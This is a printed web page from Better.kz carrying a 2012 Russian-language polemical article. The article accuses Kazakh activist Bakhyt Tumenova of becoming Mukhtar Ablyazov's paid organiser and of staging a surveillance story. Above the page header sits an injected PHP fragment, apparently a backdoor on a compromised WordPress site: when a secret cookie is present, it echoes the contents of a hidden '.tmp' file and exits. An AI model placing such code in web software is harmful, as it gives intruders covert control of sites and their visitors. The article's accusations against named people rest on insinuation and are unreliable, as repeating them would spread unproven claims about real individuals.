if (isset($_COOKIE["BsIbuVOYEiveJFkpFamX1AFEH3OK4xrKIKkWV0cFmaxChmhI"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Better.kz » Аблязов + Туменова: как тайное делать явным » Print

- Better.kz - http://better.kz/ -

Аблязов + Туменова: как тайное делать явным

Posted By Better On 12:08 In Глава, Последние статьи | Comments Disabled

Сергей АБАКШИН

241212ablyazov&tymenovaКак и предполагалась, именно Бахыт Туменова, руководитель фонда «Аман Саулык», стала в рядах Мухтара Аблязова заменой Владимиру Козлову. Конечно, не в качестве руководителя и без того незарегистрированной «Алги», которую, к тому же, как экстремистскую организацию прокуратура потребовала уничтожить — в том смысле, что запретить деятельность. Но в качестве человека, замыкающего на себя всех общественников и общественные организации, связанные с Мухтаром Аблязовым. Кстати говоря, список может получиться длинным — Шахматист на деньги не скупился. Удивительно, что всей энергии хватило только на Жанаозен, хотя планировалось нечто подобное в масштабах всей страны. Возможно, еще и поэтому г-жу Туменову было решено вывести из резерва и бросить в реальную гущу борьбы. По сведениям близких к ней людей,  Туменова отличается жесткостью и авторитарностью стиля управления. Ее методы работы с подчиненными в чем-то схожи с сухой и потребительской манерой общения самого М.Аблязова — то есть, личные проблемы сотрудника не в счет, от каждого требуется максимальная отдача. И сам патрон, и его ставленница — идеальные кандидаты для жизни в Южной Корее, стране, славящейся своим «трудолюбием», похожем на бессовестную эксплуатацию наемной силы — корейцы пашут почти без отпусков, треть работоспособного населения вымирает от сердечно-сосудистых заболеваний. То, что в СССР называлось «сгорел на работе» — в Южной Корее «сгорает» примерно 33 процента.

Первые свидетельства того, что Туменова выходит из тени и начинает активную работу по «свержению режима» на деньги Аблязова, появились еще в конце октября этого года — тогда стало известно, что Туменова переехала в здание центрального офиса «Алги» и стала получать зарплату от Аблязова, причем, исчисляемую четырехзначным числом в долларовом выражении, кроме того, ей был обещан (или, по крайней мере, она растрезвонила всем вокруг, что обещан) один из принадлежащих Мухтару коттеджей в элитной горной части Алматы.

Но это, как говорится, были только слова, написанные кем-то в интернете. А вот когда за этими словами последовали действия, подтверждающие сказанное или написанное, тогда и появилась уверенность. Правда, эти действия нуждаются в трактовке, так как большинство наших граждан просто не способны увидеть за событием подоплеку.

Вот, скажем, проходит по некоторым сайтам коротенькая информация о том, что «президент общественной организации «Аман саулык» Бахыт Туменова на сайте своей организации сообщает, что сегодня судебные приставы принесли ей уведомление о запрете на выпуск газеты «Республиканские вести – деловое обозрение»». Это сообщает сайт «Азаттык» без особых подробностей, за которыми предлагается последовать на сайт самой Туменовой. Впрочем, на ее сайте информации тоже с гулькин нос: «Сегодня судебные приставы принесли мне уведомление о запрете на выпуск газеты, которая освещает права человека в сфере охраны здоровья в Казахстане. «Республиканские вести – деловое обозрение» выходило один раз в неделю, ее целью, как и целью нашего веб-сайта www.amansaulyk.kz, являлось информирование граждан по вопросам в сфере здравоохранения.

Если я продолжу выпуск газеты для начала мне будет грозить административный штраф, а затем и уголовная ответственность.

В страну вступил декабрь...» — патетически завершает Туменова. Впрочем, внимательным людям, отслеживающим максимально полной информационные потоки в стране и за ее пределами, какие-то подробности, собственно, и не нужны. Все знают, что прокуратура Казахстана ведет кампанию по закрытию СМИ, работавших на Мухтара Аблязова и подталкивавших в Жанаозене нефтяников к организации массовых беспорядков, что и случилось в прошлом году 16-17 декабря. Эти СМИ уличены в распространении материалов, разжигающих социальную рознь, вводящих в заблуждение работников, вообразивших, что как только они «поднимутся», весь Казахстан выйдет на улицы.

Вчисле этих СМИ — телеканал К+, портал «Стан-ТВ», газета «Взгляд» и целая куча газет, называемых единым СМИ «Республика». Газета Туменовой носит вполне ассоциативное название — «Республиканские вести — деловое обозрение». Одно из наименований газеты «Республика», которая когда-то называлась и «Асссанди-Таймс» и даже «Газетой для босса» — «Деловое обозрение — Республика» (или наоборот — «Республика — деловое обозрение»). Короче говоря, даже не глядя на дизайн «Республиканских вестей» Туменовой, можно вполне определенно утверждать, что это — одна из газет, входящих в единое СМИ «Республика». А на кого работает это единое СМИ, знают в Казахстане даже малые дети.

Мало этого доказательства? Вот вам еще одно.

На том же сайте Туменовой мы обнаружили еще одно ее сообщение, не имеющее отношение к деятельности фонда «Аман Саулык» (сайт посвящен фонду): «Сегодня я была на встрече со следователем, который ведет дело по обнаружению в моей квартире отверстия в полу. К счастью, ранее закрытое дело по этому факту, продолжается...». Так начинается это сообщение. Что за прослушка? На сайте демонстрируется фотография дырки в полу офиса фонда «Аман Саулык», под которым находится помещение КСК. Читателям предлагается поверить в мутную историю о том, что какой-то неизвестный парень в этом помещении КСК сидит в закрытом кабинете целыми днями, очевидно, через дырку в потолке подслушивая Туменову. Туменова предлагает к расследованию этой истории подключиться и сотрудникам КНБ, чтобы, очевидно, следователю из полиции было не так скучно.

Порывшись еще немного в дебрях либерального интернета, мы обнаружили, откуда растут ноги у этой истории с дыркой в полу. Один из новостных порталов страны поведал: «О том, что Туменову прослушивают спецслужбы на своем веб-сайте сообщила редакция газеты «Республики» со ссылкой на некоего «Амана Шабдарбаева». Неизвестный человек сообщил, что сотрудники КНБ РК установили прослушку в квартире Бахыт Туменовой и контролируют всех, кто приходит к ней домой. Для контроля посетителей на лестничной площадке в этом году было установлено специальное видеонаблюдение, спрятанное в металлический ящик на стене подъезда.

Преследование руководителя общественного фонда, аноним связывает с ее профессиональной деятельностью и гражданской позицией».

Напомним, что «Аман Шабдарбаев» — это такой удобный источник информации, который, похоже, существует лишь в головах стоящих за «Республикой» Муратбека Кетебаева и Мухтара Аблязова и уже несколько лет исправно снабжает журналистов Петрушовой «инсайдерской информацией», причем иной раз такого характера, что ее должны были знать всего лишь несколько человек — так что вычислить «Шабдарбаева», если бы он реально существовал, не составило бы ни малейшего труда.

Вот и сейчас «Шабдарбаев» пригодился — чтобы огласить всем заинтересованным лицам, что именно она является сменой Козлова (все осведомленные точно знают, что никакого «Шабдарбаева» не существует, а якобы «слив» от него иной раз используется для передачи определенных сообщений всем связанным с Аблязовым персонам). А для неосведомленных пошла раскручиваться сенсация о прослушке Туменовой силами КНБ — как о еще одной гонимой «кровавым режимом» поборнице свободы.

[1] [2]

Article printed from Better.kz: http://better.kz/

URL to article: http://better.kz/20121224/russkij-ablyazov-tumenova-kak-tajnoe-delat-yavnym/

URLs in this post:

[1] : http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fbetter.kz%2F20121224%2Frusskij-ablyazov-tumenova-kak-tajnoe-delat-yavnym%2F&linkname=%D0%90%D0%B1%D0%BB%D1%8F%D0%B7%D0%BE%D0%B2%20%2B%20%D0%A2%D1%83%D0%BC%D0%B5%D0%BD%D0%BE%D0%B2%D0%B0%3A%20%D0%BA%D0%B0%D0%BA%20%D1%82%D0%B0%D0%B9%D0%BD%D0%BE%D0%B5%20%D0%B4%D0%B5%D0%BB%D0%B0%D1%82%D1%8C%20%D1%8F%D0%B2%D0%BD%D1%8B%D0%BC

[2] : http://www.addtoany.com/add_to/google_plus?linkurl=http%3A%2F%2Fbetter.kz%2F20121224%2Frusskij-ablyazov-tumenova-kak-tajnoe-delat-yavnym%2F&linkname=%D0%90%D0%B1%D0%BB%D1%8F%D0%B7%D0%BE%D0%B2%20%2B%20%D0%A2%D1%83%D0%BC%D0%B5%D0%BD%D0%BE%D0%B2%D0%B0%3A%20%D0%BA%D0%B0%D0%BA%20%D1%82%D0%B0%D0%B9%D0%BD%D0%BE%D0%B5%20%D0%B4%D0%B5%D0%BB%D0%B0%D1%82%D1%8C%20%D1%8F%D0%B2%D0%BD%D1%8B%D0%BC

© 2009 Better.kz. При копировании материалов ссылка на источник обязательна.